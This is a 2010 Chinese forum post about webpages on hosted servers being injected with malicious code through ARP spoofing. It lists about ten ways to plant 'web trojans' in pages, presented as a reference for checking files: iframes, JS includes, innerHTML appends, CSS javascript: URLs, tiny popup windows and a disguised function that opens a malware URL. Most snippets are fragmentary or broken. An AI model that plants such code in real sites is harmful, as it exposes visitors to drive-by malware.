纳士达 都百特 鑫工艺

热加工行业论坛

 找回密码
 免费注册

QQ登录

只需一步,快速开始


查看: 1759|回复: 0

[分享] 检查服务器最新挂马的方法

[复制链接]
  • TA的每日心情
    开心
    2023-4-24 09:21
  • 签到天数: 84 天

    连续签到: 1 天

    [LV.6]常住居民II

    发表于 2010-3-30 19:37:16 | 显示全部楼层 |阅读模式

    马上注册,结交更多热工坛友,更多精彩内容等着您!

    您需要 登录 才可以下载或查看,没有帐号?免费注册

    x
    公司安全维护客户出现奇怪现象,服务器网站均被挂马,经过仔细的检查分析,
    问题:1.整个服务器没有出现挂马相关代码,也无webshell程序。
          2.挂马代码都出现在所有页面的顶部(标签前)。
          3.新上传页面连续刷新后,均出现挂马代码。且不是随时都出现。
       经过以上分析,判定为ARP挂马。随后我们对整个网段的机器做了检查(名气比较大的机房,就不具体说了)!所有web服务器全部被挂马。寒啊!~~~~这东西比较恐怖~~只要机房做了隔离一般没事情,或者自己下载ARP卫士。
        目前此挂马方式,呈上升趋势,希望各机房网管做好隔离,防止客户受到损失!!
    如果有兴趣的朋友,可以一起探讨一下!
    ps:检查文件是否被挂马的时候可以参考下!
    一:框架挂马

    二:js文件挂马
    首先将以下代码
    document.write(""
    保存为xxx.js,
    则JS挂马代码为

    三:js变形加密
    muma.txt可改成任意后缀
    四:body挂马
    五:隐蔽挂马
    top.document.body.innerHTML = top.document.body.innerHTML + '\r\n';
    六:css中挂马
    body {
    background-image: url('javascript:document.write(""

                                   
    登录/注册后可看大图

    ')}
    七:JAJA挂马
    window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1";
    八:图片伪装
    九:伪装调用:
    十:高级欺骗
    页面要显示的内容
    function www_163_com ()
    {
    var url="网马地址";
    open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10";
    }
    </SCRIPT>
    您需要登录后才可以回帖 登录 | 免费注册

    本版积分规则

    QQ|手机版|Archiver|热加工行业论坛 ( 苏ICP备18061189号-1|豫公网安备 41142602000010号 )
    版权所有:南京热之梦信息技术有限公司

    GMT+8, 2025-12-17 02:13 , Processed in 0.129757 second(s), 22 queries .

    Powered by Discuz! X3.4

    Copyright © 2001-2020, Tencent Cloud.

    快速回复 返回顶部 返回列表